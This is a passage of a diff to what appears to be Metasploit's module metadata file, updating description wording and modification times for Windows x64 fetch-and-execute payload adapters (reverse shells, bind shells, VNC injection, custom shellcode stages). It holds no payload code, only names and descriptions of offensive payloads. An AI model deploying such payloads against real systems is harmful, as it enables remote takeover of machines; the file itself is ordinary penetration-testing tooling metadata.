|
||||
@@ -202655,7 +203016,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202665,7 +203026,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/reverse_tcp_rc4",
|
||||
@@ -202697,7 +203058,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202707,7 +203068,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/reverse_tcp_uuid",
|
||||
@@ -202738,7 +203099,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202748,7 +203109,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell_bind_tcp",
|
||||
@@ -202777,7 +203138,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202787,7 +203148,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell_reverse_tcp",
|
||||
@@ -202816,7 +203177,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -202827,7 +203188,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp",
|
||||
@@ -202859,7 +203220,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -202870,7 +203231,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
@@ -202902,7 +203263,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -202913,7 +203274,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_named_pipe",
|
||||
@@ -202944,7 +203305,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -202955,7 +203316,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_tcp",
|
||||
@@ -202991,7 +203352,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203002,7 +203363,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_rc4",
|
||||
@@ -203034,7 +203395,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203045,7 +203406,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_uuid",
|
||||
@@ -203077,7 +203438,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203088,7 +203449,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_http",
|
||||
@@ -203122,7 +203483,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203133,7 +203494,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_https",
|
||||
@@ -203164,7 +203525,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203175,7 +203536,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp",
|
||||
@@ -203211,7 +203572,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203222,7 +203583,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_rc4",
|
||||
@@ -203254,7 +203615,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203265,7 +203626,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_uuid",
|
||||
@@ -203297,7 +203658,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203308,7 +203669,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttp",
|
||||
@@ -203340,7 +203701,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -203351,7 +203712,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttps",
|
||||
@@ -203383,7 +203744,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203393,7 +203754,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp",
|
||||
@@ -203426,7 +203787,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203436,7 +203797,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid",
|
||||
@@ -203468,7 +203829,7 @@
|
||||
"bwatters-r7",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203478,7 +203839,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_named_pipe",
|
||||
@@ -203510,7 +203871,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203520,7 +203881,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_tcp",
|
||||
@@ -203557,7 +203918,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203567,7 +203928,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_tcp_rc4",
|
||||
@@ -203600,7 +203961,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203610,7 +203971,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/bind_tcp_uuid",
|
||||
@@ -203642,7 +204003,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203652,7 +204013,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_http",
|
||||
@@ -203686,7 +204047,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203696,7 +204057,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_https",
|
||||
@@ -203728,7 +204089,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203738,7 +204099,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_named_pipe",
|
||||
@@ -203770,7 +204131,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203780,7 +204141,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_tcp",
|
||||
@@ -203817,7 +204178,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203827,7 +204188,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_tcp_rc4",
|
||||
@@ -203860,7 +204221,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203870,7 +204231,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_tcp_uuid",
|
||||
@@ -203902,7 +204263,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203912,7 +204273,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_winhttp",
|
||||
@@ -203944,7 +204305,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203954,7 +204315,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_winhttps",
|
||||
@@ -203986,7 +204347,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203996,7 +204357,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/encrypted_shell/reverse_tcp",
|
||||
@@ -204028,7 +204389,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -204038,7 +204399,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/encrypted_shell_reverse_tcp",
|
||||
@@ -204067,7 +204428,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
